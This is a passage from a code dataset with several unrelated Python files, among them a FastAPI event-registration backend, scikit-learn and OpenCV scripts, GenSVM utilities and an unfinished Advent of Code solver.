f\"https://storage.googleapis.com/{firebase_storage.name}/{destination_path}\"\n print(\"fileurl\")\n\n # Create a response dictionary in the specified format\n response_data = {\"status_code\": 200, \"status\": \"success\", \"data\": {\"file_url\": file_url}}\n \n # Return a JSONResponse with the custom response data and status code\n return JSONResponse(content=response_data, status_code=200)\n\n except HTTPException as http_exception:\n # Create a response dictionary for error cases\n response_data = {\"status_code\": http_exception.status_code, \"status\": \"failed\", \"message\": http_exception.detail}\n \n # Return a JSONResponse with the custom error response data and status code\n return JSONResponse(content=response_data, status_code=http_exception.status_code)\n except Exception as e:\n # Create a response dictionary for general exceptions\n response_data = {\"status_code\": 500, \"status\": \"failed\", \"message\": f\"Terjadi kesalahan: {str(e)}\"}\n \n # Return a JSONResponse with the custom error response data and status code\n return JSONResponse(content=response_data, status_code=500)\n\n@event_router.post(\"/workshop\")\nasync def upload_data_workshop(request: WorkshopRegistrationRequest):\n try:\n credentials_file = \"sa.json\"\n\n print(\"connecting spreadsheet\")\n spreadsheet = connect(credentials_file)\n\n worksheet = open_worksheet(spreadsheet, spreadsheet_name, \"workshop\")\n\n # Definisikan zona waktu Asia/Jakarta\n jakarta_timezone = timezone(timedelta(hours=7)) # UTC+7 untuk Asia/Jakarta\n\n # Dapatkan waktu saat ini dalam zona waktu Asia/Jakarta\n current_datetime_wib = datetime.now(jakarta_timezone)\n formatted_datetime = current_datetime_wib.strftime(\"%m/%d/%Y %H:%M:%S\")\n\n data_to_append = [\n formatted_datetime,\n request.full_name,\n request.email,\n request.phone_number,\n request.institution,\n request.profession,\n request.address,\n request.url_bukti_follow\n ]\n\n print(data_to_append)\n\n append_data(worksheet, data_to_append)\n\n # Prepare the response data\n response_data = {\n \"status_code\": 200,\n \"status\": \"success\",\n \"data\": {\n \"formatted_datetime\": formatted_datetime,\n \"full_name\": request.full_name,\n \"email\": request.email,\n \"phone_number\": request.phone_number,\n \"institution\": request.institution,\n \"profession\": request.profession,\n \"address\": request.address,\n \"url_bukti_follow\": request.url_bukti_follow,\n \"row_inserted\": worksheet.row_count\n }\n }\n\n print(response_data)\n\n # Return the response\n return response_data\n\n except Exception as e:\n # Prepare the response for errors\n response_data = {\n \"status_code\": 500,\n \"status\": \"failed\",\n \"data\": {\n \"message\": f\"Terjadi kesalahan: {str(e)}\"\n }\n }\n\n # Return the error response\n return response_data\n\n@event_router.post(\"/conference\")\nasync def upload_data_conference(request: NonWorkshopRegistrationRequest):\n try:\n credentials_file = \"sa.json\"\n\n print(\"connecting spreadsheet\")\n spreadsheet = connect(credentials_file)\n\n worksheet = open_worksheet(spreadsheet, spreadsheet_name, \"workshop\")\n\n # Definisikan zona waktu Asia/Jakarta\n jakarta_timezone = timezone(timedelta(hours=7)) # UTC+7 untuk Asia/Jakarta\n\n # Dapatkan waktu saat ini dalam zona waktu Asia/Jakarta\n current_datetime_wib = datetime.now(jakarta_timezone)\n formatted_datetime = current_datetime_wib.strftime(\"%m/%d/%Y %H:%M:%S\")\n\n data_to_append = [\n formatted_datetime,\n request.full_name,\n request.email,\n request.phone_number,\n 
request.institution,\n            request.profession,\n            request.address,\n            request.url_bukti_pembayaran\n        ]\n\n        print(data_to_append)\n\n        append_data(worksheet, data_to_append)\n\n        response_data = {\n            \"status_code\": 200,\n            \"status\": \"success\",\n            \"data\": {\n                \"formatted_datetime\": formatted_datetime,\n                \"full_name\": request.full_name,\n                \"email\": request.email,\n                \"phone_number\": request.phone_number,\n                \"institution\": request.institution,\n                \"profession\": request.profession,\n                \"address\": request.address,\n                \"url_bukti_pembayaran\": request.url_bukti_pembayaran,\n                \"row_inserted\": worksheet.row_count\n            }\n        }\n\n        print(response_data)\n\n        # Return the response\n        return response_data\n\n    except Exception as e:\n        # Prepare the response for errors\n        response_data = {\n            \"status_code\": 500,\n            \"status\": \"failed\",\n            \"data\": {\n                \"message\": f\"Terjadi kesalahan: {str(e)}\"\n            }\n        }\n\n        # Return the error response\n        return response_data\n\n\n## ADMIN ROUTER\ncontent_types = {\n    'jpeg': 'image/jpeg',\n    'jpg': 'image/jpeg',\n    'png': 'image/png',\n}\n\n@admin_router.post(\"/upload-partner\")\nasync def upload_sponsor(access_code: str, kelas: ClassEnum, category: CategoryEnum, file: UploadFile, nama_sponsor: str):\n    allowed_formats = {'jpeg', 'jpg', 'png'}\n    max_file_size = 20 * 1024 * 1024\n\n    try:\n        # Validate the access_code\n        if access_code not in allowed_access_codes:\n            raise HTTPException(status_code=400, detail=\"Access code is not valid\")\n        file_format = file.filename.split('.')[-1].lower()\n        if file_format not in allowed_formats:\n            raise HTTPException(status_code=400, detail=\"Format file tidak didukung\")\n\n        file_size = file.file.seek(0, 2)\n        if file_size > max_file_size:\n            raise HTTPException(status_code=400, detail=\"Ukuran file terlalu besar\")\n\n        file.file.seek(0)\n\n        current_time = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n\n        # Modify the filename by appending the file format and replacing spaces with underscores\n        new_filename = f\"{nama_sponsor.replace(' ', '_')}.{file_format}\"\n\n        destination_path = f\"{kelas}/{category}/{new_filename}\"\n\n        blob = firebase_storage.blob(destination_path)\n\n        # Set the content type based on the file format using a dictionary (content_types)\n\n        if file_format in content_types:\n            blob.content_type = content_types[file_format]\n\n        blob.upload_from_file(file.file)\n\n        file_url = f\"https://storage.googleapis.com/{firebase_storage.name}/{destination_path}\"\n\n        # Create a new document with an auto-generated ID in the \"partners\" collection\n        data = {\n            \"name\": nama_sponsor,\n            \"category\": kelas,\n            \"size\": category,\n            \"file_url\": file_url,\n        }\n\n        db.collection(\"partners\").add(data)\n\n        return {\"message\": \"success\", \"file_url\": file_url}\n\n    except HTTPException as http_exception:\n        return {\"message\": http_exception.detail}\n    except Exception as e:\n        return {\"message\": f\"Terjadi kesalahan: {str(e)}\"}\n\n@admin_router.get(\"/all-partner-name\")\nasync def get_all_partner_names():\n    try:\n        # Query Firestore to get all documents in the \"partners\" collection\n        query = db.collection(\"partners\").stream()\n\n        partner_names = []\n\n        for doc in query:\n            data = doc.to_dict()\n            partner_name = data.get(\"name\")\n            if partner_name:\n                partner_names.append(partner_name)\n\n        return partner_names\n\n    except Exception as e:\n        raise HTTPException(status_code=500, detail=f\"Terjadi kesalahan: {str(e)}\")\n\n@admin_router.get(\"/partner-detail/\")\nasync def get_partner_detail(partner_name: str):\n    try:\n        # Query Firestore to find a 
document with the specified partner name\n query = db.collection(\"partners\").where(\"name\", \"==\", partner_name).stream()\n\n partner_detail = None\n\n for doc in query:\n partner_detail = doc.to_dict()\n break # Assuming there is only one partner with the given name\n\n if partner_detail:\n return partner_detail\n else:\n raise HTTPException(status_code=404, detail=\"Partner not found\")\n\n except Exception as e:\n raise HTTPException(status_code=500, detail=f\"Terjadi kesalahan: {str(e)}\")\n\n@admin_router.delete(\"/delete-partner/\")\nasync def delete_partner(access_code:str, partner_name: str):\n try:\n # Validate the access_code\n if access_code not in allowed_access_codes:\n raise HTTPException(status_code=400, detail=\"Access code is not valid\")\n # Query Firestore to find a document with the specified partner name\n query = db.collection(\"partners\").where(\"name\", \"==\", partner_name).stream()\n\n for doc in query:\n # Delete the document with the matching partner name\n doc.reference.delete()\n return {\"message\": f\"Partner '{partner_name}' deleted successfully\"}\n\n # If no matching document is found, raise a 404 Not Found exception\n raise HTTPException(status_code=404, detail=\"Partner not found\")\n\n except HTTPException as http_exception:\n raise http_exception\n except Exception as e:\n raise HTTPException(status_code=500, detail=f\"Terjadi kesalahan: {str(e)}\")\n\n## ASSETS ROUTER\n@asset_router.get(\"/url-media\")\nasync def url_media_partners():\n try:\n # Query Firestore to get all documents in \"partners\" collection with category \"media_partner\"\n query = db.collection(\"partners\").where(\"category\", \"==\", \"media_partner\").stream()\n\n media_partners = []\n\n for doc in query:\n media_partners.append(doc.to_dict())\n\n # Prepare the success response\n response_data = {\n \"status_code\": 200,\n \"status\": \"success\",\n \"data\": media_partners\n }\n\n return response_data\n\n except Exception as e:\n # Prepare the error response\n response_data = {\n \"status_code\": 500,\n \"status\": \"failed\",\n \"message\": f\"Terjadi kesalahan: {str(e)}\"\n }\n\n raise HTTPException(status_code=500, detail=response_data)\n\n# Modify the url_sponsors endpoint\n@asset_router.get(\"/url-sponsor\")\nasync def url_sponsors():\n try:\n # Query Firestore to get all documents in \"partners\" collection with category \"sponsor\"\n query = db.collection(\"partners\").where(\"category\", \"==\", \"sponsor\").stream()\n\n sponsors = []\n\n for doc in query:\n sponsors.append(doc.to_dict())\n\n # Prepare the success response\n response_data = {\n \"status_code\": 200,\n \"status\": \"success\",\n \"data\": sponsors\n }\n\n return response_data\n\n except Exception as e:\n # Prepare the error response\n response_data = {\n \"status_code\": 500,\n \"status\": \"failed\",\n \"message\": f\"Terjadi kesalahan: {str(e)}\"\n }\n\n raise HTTPException(status_code=500, detail=response_data)","repo_name":"reyshazni/icee2024-be","sub_path":"routes/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":14084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"33915456337","text":"# 2D diffusion on a real 2D surface - initial release on a patch by either density or Boolean intersection of e.g. 
a sphere with a plane\n\n# Note that this example could use an outside library to do the Boolean intersection.\n# We might implement such functionality, but I suspect other libraries may be available.\n\n# Parameters to vary\niterations = 1000\nnum_A = 200\nsheet_size = 10\nrelease_radius = 2\n\n\n# Import the things needed\nimport pymcell as m\nimport random\nimport external_geometry_library as egl\n\n\n# Make a world\nsim = m.create_model()\n\n\n# Set current time and timestep\nsim.t = 0.0\nsim.dt = 1e-6\n\n\n# Add the standard iteration callback to capture molecule positions\nsim.iteration_callback_list.append ( callback=m.viz_output_callback, data={['ALL']}, skip=0 )\n\n\n# Create the species and add to simulation\nmol_A = m.create_species(name=\"A\",dc=1e-5,type=m.SURFACE_TYPE) # Volume mol by default\nsim.species_list.append(mol_A)\n\n\n# Create a sheet at z=0 (the old-fashioned way)\npoints = [\n [ -1, -1, 0 ],\n [ 1, -1, 0 ],\n [ 1, 1, 0 ],\n [ -1, 1, 0 ] ]\n\nfaces = [\n [ 0, 1, 2 ],\n [ 0, 2, 3 ] ]\n\n# Scale the points in the x,y dimension\nfor p in points:\n p[0] *= sheet_size\n p[1] *= sheet_size\n\nrelease_points = []\n\nuse_outside_library = False\nif use_outside_library:\n egl_plane = egl.create_object_from_points_and_faces ( points, faces )\n egl_sphere = egl.create_sphere ( center=(0,0,0), radius=release_radius )\n (egl_point_list, egl_faces_inside, egl_faces_outside) = egl.subdivide_surface_with_solid ( egl_plane, egl_sphere )\n # Each element of the faces arrays is a list of 3 vertices in the point list\n\n final_plane = m.create_object_from_points_faces ( name=\"entire_plane\", points=egl_point_list, faces=egl_faces_inside+egl_faces_outside )\n release_surf = m.create_surface_from_faces ( name=\"rel_surf\", obj=final_plane, faces = egl_faces_inside )\n\n sim.object_list.append ( final_plane )\n\n release_points = []\n for i in range(num_A):\n p = m.random_point_on_face_list ( release_surf )\n release_points.append ( p )\nelse:\n while len(release_points) < num_A:\n x = random.uniform(-sheet_size, sheet_size)\n y = random.uniform(-sheet_size, sheet_size)\n if ((x*x)+(y*y)) < (release_radius*release_radius):\n release_points.append ( [x,y,0] )\n\n# Release the molecules\nsim.add_molecules_at_points ( mol=mol_A, points=release_points ) # Add by reference, could also use name='A'\n\n\n# Run the simulation\n\nsim.run(iterations=iterations)\n\n","repo_name":"mcellteam/libMCellPP","sub_path":"api_prototype/bob/test_4_2d_diffusion.py","file_name":"test_4_2d_diffusion.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"38777970362","text":"import numpy as np \nimport cv2\nimport argparse\nimport matplotlib.pyplot as plt\n\n#construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument('-i', '--image', required = True, help = \"Path to the image\")\nap.add_argument(\"-s\", \"--shrink\", action=\"store_true\")\nargs = vars(ap.parse_args())\n\n#Load the image and clone it for output\nimg = cv2.imread(args['image'], cv2.IMREAD_ANYCOLOR | cv2.IMREAD_ANYDEPTH)\nif args[\"shrink\"]:\n\timg = cv2.resize(img, (0,0), fx=.25, fy=.25)\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n\n\n#The canney algorithm only takes 8-bit images as input, need to convert if the image is in 16bit\nif(gray.dtype == \"uint16\"):\n\tgray = (gray/256).astype('uint8')\n\n\nedges = cv2.Canny(gray, 10, 20)\n#adjust low and high hysteresis threshold - to test out what 
CHT will do (canny computerphile vid)\n\n\nplt.imshow(cv2.cvtColor(edges, cv2.COLOR_GRAY2RGB))\nplt.show()\n\n'''\ncv2.imshow(\"canny\", np.hstack([gray, edges]))\ncv2.waitKey(0)\n'''","repo_name":"mgharbi/computational-periscopy","sub_path":"testprograms/canny.py","file_name":"canny.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"19693151955","text":"import unittest\n\nfrom pytma.POSTag import POStag\n\nclass TestPOSTag(unittest.TestCase):\n def test_pos_tag(self):\n test_text = u\"It was now reading the sign that said Privet Drive — no, looking at the sign; \" \\\n \"cats couldn't read maps or signs.He didn't see the owls swooping past in broad daylight, \" \\\n \"though people down in the street did; they pointed and gazed open-mouthed as owl after \" \\\n \"owl sped overhead\"\n\n pos = POStag(test_text, DEBUG=True)\n\n tags = pos.transform()\n\n for k in tags:\n print(k, tags[k])\n\n print(\"Done\")\n\n self.assertEqual(tags['It'], 'n')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"aloidia-solutions/nlp-modelling","sub_path":"pytma/tests/test_POSTag.py","file_name":"test_POSTag.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"35911032768","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom termcolor import colored, cprint\r\nimport time\r\nfrom sklearn.model_selection import learning_curve\r\n\r\n#\r\n# 'max_leaf_nodes':[2, 3, 4, 5, 6, 7, 8, 9, 10],\r\n#'min_samples_leaf':[50,52,55,57,58,60]\r\n#max-depth 7 and max_leaf_nodes 30\r\n#'max_depth': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\r\n#max-depth 5\r\n#max_depth 5, min_samples_leaf 30\r\n\r\ngrid_param = {\r\n 'max_depth':[350,360,370,380,390,400,410,420],\r\n 'max_leaf_nodes':[300,320,340,360,380,400,420,440,460]\r\n}\r\n#==== Uncomment to Run Diabetes ======\r\n# dataset = pd.read_csv(\"./csv_result-diabetes.csv\")\r\n# X = dataset.drop('class', axis=1)\r\n# y = dataset['class']\r\n\r\n#====Uncomment to Run Wine =========\r\ndataset = pd.read_csv(\"./winequality-red.csv\")\r\nX = dataset.drop('quality', axis=1)\r\ny = dataset['quality']\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)\r\n# Scale data so it is uniformly evaluated\r\nscaler = StandardScaler()\r\nscaler.fit(X_train)\r\nX_train = scaler.transform(X_train)\r\nX_test = scaler.transform(X_test)\r\ndecision_tree = DecisionTreeClassifier()\r\nstart_time = time.time()\r\ngd_sr = GridSearchCV(estimator=decision_tree, param_grid=grid_param, scoring='accuracy', cv=3, n_jobs=-1)\r\ngd_sr.fit(X_train, y_train.values.ravel())\r\n\r\n# Print out helpful data from the grid search\r\ncprint(\"Training time: {0} \\n\".format(time.time() - start_time), \"blue\")\r\nbest_params = gd_sr.best_params_\r\nbest_result = gd_sr.best_score_\r\ncprint(\"best parameters were: {0}\".format(best_params), 'red')\r\ncprint(\"best results were: {0}\".format(best_result), 'red')\r\n\r\n# Make and run the classifier with the ideal parameters\r\ndepth = best_params[\"max_depth\"]\r\ncrit = 
best_params['max_leaf_nodes']\r\ndecision_tree = DecisionTreeClassifier(max_leaf_nodes=crit,max_depth=depth)\r\ndecision_tree = decision_tree.fit(X_train, y_train.values.ravel())\r\npredicted = decision_tree.predict(X_test)\r\nprint(accuracy_score(y_test, predicted))\r\ndecision_tree = DecisionTreeClassifier()\r\ndecision_tree = decision_tree.fit(X_train, y_train.values.ravel())\r\npredicted = decision_tree.predict(X_test)\r\nprint(accuracy_score(y_test, predicted))\r\niArray = []\r\naccuracy = []\r\nfor i in range(2,500):\r\n decision_tree = DecisionTreeClassifier(max_depth = i)\r\n decision_tree = decision_tree.fit(X_train, y_train.values.ravel())\r\n predicted = decision_tree.predict(X_test)\r\n acc = accuracy_score(y_test, predicted)\r\n iArray.append(i)\r\n accuracy.append(acc)\r\n print(\"max_depth:\", i)\r\n print(\"accuracy:\", acc)\r\nplt.plot(iArray, accuracy, color='red', linestyle='solid', marker='x', markerfacecolor='red', markersize=5)\r\ntitle = \"Wine Quality\" + \": Accuracy vs. Maximum Depth - \" + 'Decision Tree'\r\nplt.title(title)\r\nplt.xlabel('Maximum Depth')\r\nplt.ylabel('Accuracy')\r\nplt.show()\r\n\r\n\r\n# #Curve\r\n# train_sizes, train_scores, test_scores = learning_curve(decision_tree, X, y, train_sizes=np.linspace(.05, .95, num=19), n_jobs=None)\r\n# train_scores_mean = np.mean(train_scores, axis=1)\r\n# test_scores_mean = np.mean(test_scores, axis=1)\r\n# plt.figure(figsize=(12, 6))\r\n# plt.plot(train_sizes, 1- train_scores_mean, color='red', linestyle='solid', marker='x', markerfacecolor='red', markersize=5)\r\n# plt.plot(train_sizes, 1- test_scores_mean, color='green', linestyle='solid', marker='x', markerfacecolor='green', markersize=5)\r\n# title = \"Wine Quality\" + \": Training Error and Testing Error vs. Training size - \" + 'Decision Tree'\r\n# plt.title(title)\r\n# plt.xlabel('Training size')\r\n# plt.ylabel('Error Rate')\r\n# plt.show()","repo_name":"abbylacjames/Machine_Learning_CS4641","sub_path":"decision_trees.py","file_name":"decision_trees.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"1427573069","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Functions in GenSVM that are taken from Scikit-Learn\n\nThe GenSVM Python package is designed to work in the same way as Scikit-Learn \nclassifiers, as this makes it easier for people familiar with Scikit-Learn to \nuse GenSVM. As such, some of the functionality of the GenSVM Python package is \nsimilar to code in the Scikit-Learn package (such as formatting the grid search \nresults). To keep a clean separation between code from Scikit-Learn (which is \nlicensed under the BSD license) and code written by the author(s) of the GenSVM \npackage, the code from scikit-learn is placed here in explicit self-contained \nfunctions. 
To comply with clause a of the BSD license, it is repeated below as \nrequired.\n\n\"\"\"\n\nimport numbers\nimport numpy as np\nimport warnings\n\nfrom collections import defaultdict\nfrom contextlib import suppress\nfrom functools import partial\n\nfrom sklearn.metrics._scorer import _MultimetricScorer\nfrom sklearn.metrics._scorer import check_scoring\n\nfrom .core import GenSVM\nfrom .util import get_ranks\n\n\n# BEGIN SCIKIT LEARN CODE\n\n\"\"\"\n\nNew BSD License\n\nCopyright (c) 2007–2017 The scikit-learn developers.\nAll rights reserved.\n\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n a. Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimer.\n b. Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n c. Neither the name of the Scikit-learn Developers nor the names of\n its contributors may be used to endorse or promote products\n derived from this software without specific prior written\n permission.\n\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE FOR\nANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\nLIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY\nOUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\nDAMAGE.\n\n\"\"\"\n\nfrom numpy.ma import MaskedArray\n\nfrom sklearn.exceptions import NotFittedError\nfrom sklearn.model_selection._validation import (\n _normalize_score_results,\n _aggregate_score_dicts,\n)\n\n\ndef _skl_format_cv_results(\n out,\n return_train_score,\n candidate_params,\n n_candidates,\n n_splits,\n scorers,\n iid,\n):\n\n out = _aggregate_score_dicts(out)\n\n results = dict()\n\n def _store(key_name, array, weights=None, splits=False, rank=False):\n \"\"\"A small helper to store the scores/times to the cv_results_\"\"\"\n # When iterated first by splits, then by parameters\n # We want `array` to have `n_candidates` rows and `n_splits` cols.\n array = np.array(array, dtype=np.float64).reshape(\n n_candidates, n_splits\n )\n if splits:\n for split_i in range(n_splits):\n # Uses closure to alter the results\n results[\"split%d_%s\" % (split_i, key_name)] = array[:, split_i]\n\n array_means = np.average(array, axis=1, weights=weights)\n results[\"mean_%s\" % key_name] = array_means\n\n if key_name.startswith((\"train_\", \"test_\")) and np.any(\n ~np.isfinite(array_means)\n ):\n warnings.warn(\n f\"One or more of the {key_name.split('_')[0]} scores \"\n f\"are non-finite: {array_means}\",\n category=UserWarning,\n )\n\n # Weighted std is not directly available in numpy\n array_stds = np.sqrt(\n np.average(\n (array - array_means[:, np.newaxis]) ** 2,\n axis=1,\n weights=weights,\n )\n )\n results[\"std_%s\" % key_name] = array_stds\n\n if rank:\n results[\"rank_%s\" % key_name] = np.asarray(\n 
get_ranks(-array_means), dtype=np.int32\n )\n\n _store(\"fit_time\", out[\"fit_time\"])\n _store(\"score_time\", out[\"score_time\"])\n # Use one MaskedArray and mask all the places where the param is not\n # applicable for that candidate. Use defaultdict as each candidate may\n # not contain all the params\n param_results = defaultdict(\n partial(MaskedArray, np.empty(n_candidates), mask=True, dtype=object)\n )\n\n for cand_i, params in enumerate(candidate_params):\n for name, value in params.items():\n # An all masked empty array gets created for the key\n # `\"param_%s\" % name` at the first occurrence of `name`.\n # Setting the value at an index also unmasks that index\n param_results[\"param_%s\" % name][cand_i] = value\n\n results.update(param_results)\n # Store a list of param dicts at the key 'params'\n results[\"params\"] = candidate_params\n\n test_scores_dict = _normalize_score_results(out[\"test_scores\"])\n if return_train_score:\n train_scores_dict = _normalize_score_results(out[\"train_scores\"])\n\n for scorer_name in test_scores_dict:\n # Computed the (weighted) mean and std for test scores alone\n _store(\n \"test_%s\" % scorer_name,\n test_scores_dict[scorer_name],\n splits=True,\n rank=True,\n weights=None,\n )\n if return_train_score:\n _store(\n \"train_%s\" % scorer_name,\n train_scores_dict[scorer_name],\n splits=True,\n )\n return results\n\n\ndef _skl_check_is_fitted(estimator, method_name, refit):\n if not refit:\n raise NotFittedError(\n \"This %s instance was initialized \"\n \"with refit=False. %s is \"\n \"available only after refitting on the best \"\n \"parameters. You can refit an estimator \"\n \"manually using the ``best_parameters_`` \"\n \"attribute\" % (type(estimator).__name__, method_name)\n )\n else:\n if not hasattr(estimator, \"best_estimator_\"):\n raise NotFittedError(\n \"This %s instance is not fitted yet. Call \"\n \"'fit' with appropriate arguments before using this \"\n \"estimator.\" % type(estimator).__name__\n )\n\n\ndef _skl_grid_score(X, y, scorer_, best_estimator_, refit, multimetric_):\n \"\"\"Returns the score on the given data, if the estimator has been\n refit.\n\n This uses the score defined by ``scoring`` where provided, and the\n ``best_estimator_.score`` method otherwise.\n\n Parameters\n ----------\n X : array-like, shape = [n_samples, n_features]\n Input data, where n_samples is the number of samples and\n n_features is the number of features.\n\n y : array-like, shape = [n_samples] or [n_samples, n_output], optional\n Target relative to X for classification or regression;\n None for unsupervised learning.\n\n Returns\n -------\n score : float\n \"\"\"\n if scorer_ is None:\n raise ValueError(\n \"No score function explicitly defined, \"\n \"and the estimator doesn't provide one %s\" % best_estimator_\n )\n score = scorer_[refit] if multimetric_ else scorer_\n return score(best_estimator_, X, y)\n\n\ndef _skl_score(estimator, X_test, y_test, scorer):\n \"\"\"Compute the score(s) of an estimator on a given test set.\n Will return a dict of floats if `scorer` is a dict, otherwise a single\n float is returned.\n \"\"\"\n if isinstance(scorer, dict):\n # will cache method calls if needed. scorer() returns a dict\n scorer = _MultimetricScorer(**scorer)\n if y_test is None:\n scores = scorer(estimator, X_test)\n else:\n scores = scorer(estimator, X_test, y_test)\n\n error_msg = (\n \"scoring must return a number, got %s (%s) \" \"instead. 
(scorer=%s)\"\n )\n if isinstance(scores, dict):\n for name, score in scores.items():\n if hasattr(score, \"item\"):\n with suppress(ValueError):\n # e.g. unwrap memmapped scalars\n score = score.item()\n if not isinstance(score, numbers.Number):\n raise ValueError(error_msg % (score, type(score), name))\n scores[name] = score\n else: # scalar\n if hasattr(scores, \"item\"):\n with suppress(ValueError):\n # e.g. unwrap memmapped scalars\n scores = scores.item()\n if not isinstance(scores, numbers.Number):\n raise ValueError(error_msg % (scores, type(scores), scorer))\n return scores\n\n\ndef _skl_check_refit_for_multimetric(self, scores):\n \"\"\"Check that `refit` is compatible with `scores` and is valid\"\"\"\n multimetric_refit_msg = (\n \"For multi-metric scoring, the parameter refit must be set to a \"\n \"scorer key or a callable to refit an estimator with the best \"\n \"parameter setting on the whole data and make the best_* \"\n \"attributes available for that metric. If this is not needed, \"\n f\"refit should be set to False explicitly. {self.refit!r} was \"\n \"passed.\"\n )\n\n valid_refit_dict = isinstance(self.refit, str) and self.refit in scores\n\n if (\n self.refit is not False\n and not valid_refit_dict\n and not callable(self.refit)\n ):\n raise ValueError(multimetric_refit_msg)\n","repo_name":"GjjvdBurg/PyGenSVM","sub_path":"gensvm/sklearn_util.py","file_name":"sklearn_util.py","file_ext":"py","file_size_in_byte":9857,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"} +{"seq_id":"37868139641","text":"import itertools\nimport re\nimport time\n\nfrom collections import Counter\n\nclass cube:\n\n def __init__(self, filename):\n \"\"\" self.cube is a list of (x, y, z) tuples which are active\n \"\"\"\n self.cube = []\n values = []\n self.types = {}\n self.tickets = []\n f = open(filename, 'r')\n row = 0\n for line in f:\n values.append(line.strip())\n \n self.width = len(values[0])\n self.height = len(values)\n self.depth = 0\n print(f\"input: {values} dimensions ({self.width} x {self.height} x {self.depth})\")\n \n\n self.cube.append(values)\n\n self._shift(1)\n self.printCube()\n\n def _shift(self, d=1):\n \"\"\" Shifts a cube (+d, +d, +d) in 3-space\n \"\"\"\n newWidth = self.width+d\n newHeight = self.height+d\n newDepth = self.depth+d\n newcube = [[''.join(['.' 
for x in range(self.width+d)]) for y in range(self.height+d)] for z in range(self.depth+d)]\n \n print(newcube)\n newrow = ''.join(['.']*self.width)\n newlines = [newrow]*self.height\n\n\n\n def printCube(self):\n print(f\"Cube has {self.depth} layers:\")\n for d in range(self.depth):\n for l in self.cube[d]:\n print(l)\n if d < self.depth:\n print(\"\")\n\n\nclass machine:\n\n def __init__(self, filename):\n self.input = cube(filename)\n \n def runProgram(self):\n result = 0\n for myticket in self.input.tickets:\n result += self.input.testvalid(myticket)\n return result\n\n\ninput = cube('testinput.txt')\nprint(\"-----------------\")\n\n# myMachine = machine('testinput.txt')\n# finalState = myMachine.runProgram()\n# print(f\"Final State: {finalState}\")\n\n# myMachine = machine('input.txt')\n# finalState = myMachine.runProgram()\n# print(f\"Final State: {finalState}\")\n","repo_name":"chipmonkey/adventofcode2020","sub_path":"day17/try1.py","file_name":"try1.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"24153352188","text":"import transformations as tr\n\n# Function that returns a sentence depending on the value of the level in the JSON file\ndef level(level,language,proba_error):\n fl_type = level[\"type\"]\n value = tr.transform_numbers(level[\"valeur\"],language,proba_error)\n\n if language == \"FR\":\n switcher_level_FR = {\n \"descente\" : \"Descendons niveau {}. . \".format(value),\n \"montee\" : \"Montons niveau {}. .\".format(value),\n \"fixe\" : \"Maintenons niveau {}. . \".format(value),\n }\n return switcher_level_FR[fl_type] \n elif language == \"EN\":\n switcher_level_EN = {\n \"descente\" : \"Descending level {}. . \".format(value),\n \"montee\" : \"Climbing level {}. . \".format(value),\n \"fixe\" : \"Maintaining level {}. . \".format(value),\n }\n return switcher_level_EN[fl_type] ","repo_name":"bongtzeyaw/text-to-speech","sub_path":"src/build_sentence/say_level.py","file_name":"say_level.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34878177682","text":"from pathlib import Path\n\nfrom ..ReSQDataset import (\n TEXT_ANS_CHOICES,\n PREFIX_TO_CHOICES,\n SUFFIX_TO_CHOICES,\n)\n\nfrom ... import FewShotDemoGenerator\n\n\nclass ReSQDemoGenerator(FewShotDemoGenerator):\n def __init__(\n self,\n demo_file=\"resq-demo.json\",\n demo_path=None,\n prefix_to_choices=PREFIX_TO_CHOICES,\n 